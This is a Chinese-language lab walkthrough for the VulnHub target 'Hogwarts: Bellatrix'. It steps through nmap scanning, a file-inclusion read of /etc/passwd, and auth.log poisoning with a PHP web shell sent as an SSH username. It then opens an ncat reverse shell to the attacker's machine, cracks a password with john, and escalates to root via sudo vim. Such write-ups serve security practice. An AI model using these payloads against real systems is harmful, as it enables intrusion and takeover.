HOGWARTS: BELLATRIX 靶机渗透
字数 1049 2025-08-15 21:33:59
HOGWARTS: BELLATRIX 靶机渗透实战教程
靶机基础信息
- 下载链接: https://www.vulnhub.com/entry/hogwarts-bellatrix,609/
- 难度等级: 简单/中等
- 发布日期: 2020年11月28日
- 渗透目标: 获取root权限
- 关键提示:
- 除非必要,不需要使用暴力破解
ncat是关键工具
环境准备
- 使用VMware Workstation Pro搭建靶机环境
- 将Kali Linux和靶机都设置为桥接模式
- 确保两者在同一网络段
渗透测试流程
一、信息收集阶段
1. 发现靶机IP
nmap 192.168.1.0/24
- 发现靶机IP: 192.168.1.105
2. 端口和服务扫描
nmap -sV -p- -A -O 192.168.1.105
- 扫描结果:
- 22/tcp: OpenSSH 8.3p1 Ubuntu 1
- 80/tcp: Apache httpd 2.4.46 (Ubuntu)
3. 网站信息收集
- 查看网站源代码寻找线索
二、漏洞探测与利用
1. 文件包含漏洞(LFI)利用
发现存在文件包含漏洞的页面:
http://192.168.1.105/ikilledsiriusblack.php?file=/etc/passwd
- 可以读取系统文件
2. 利用auth.log进行攻击
- 访问日志文件:
http://192.168.1.105/ikilledsiriusblack.php?file=/var/log/auth.log
- 利用SSH注入PHP代码:
ssh '<?php system($_GET['cmd']); ?>'@192.168.1.105
- 这会向auth.log中注入恶意代码
3. 获取反向Shell
- 通过注入的代码执行命令:
view-source:http://192.168.1.105/ikilledsiriusblack.php?file=/var/log/auth.log&cmd=ls -la
- 使用ncat建立反向shell:
ncat 192.168.1.109 1234 -e /bin/bash
- 升级为交互式shell:
python3 -c "import pty;pty.spawn('/bin/bash')"
三、权限提升
1. 信息收集
- 查看当前目录:
ls -la
- 发现隐藏目录包含密码文件
2. 密码破解
- 将密码文件复制到Kali
- 使用John the Ripper破解:
john --wordlist=/usr/share/wordlists/rockyou.txt hashfile
- 获取凭据:
- 用户名: lestrange
- 密码: ihateharrypotter
3. 提权操作
- 切换到lestrange用户:
su lestrange
- 使用sudo vim提权:
sudo vim -c ':!/bin/sh'
- 参考GTFOBins提权方法: https://gtfobins.github.io/gtfobins/vim/#sudo
技术要点总结
-
文件包含漏洞利用:
- 通过参数注入读取系统文件
- 重点利用/var/log/auth.log
-
日志污染技术:
- 通过SSH失败登录注入PHP代码
- 利用日志文件执行系统命令
-
权限提升路径:
- 发现隐藏凭据文件
- 使用john破解密码
- 利用sudo vim的提权方法
参考资源
学习建议
- 深入理解文件包含漏洞原理
- 掌握日志污染技术的应用场景
- 熟悉常见提权方法,特别是GTFOBins中的技术
- 练习信息收集技巧,特别是隐藏文件的发现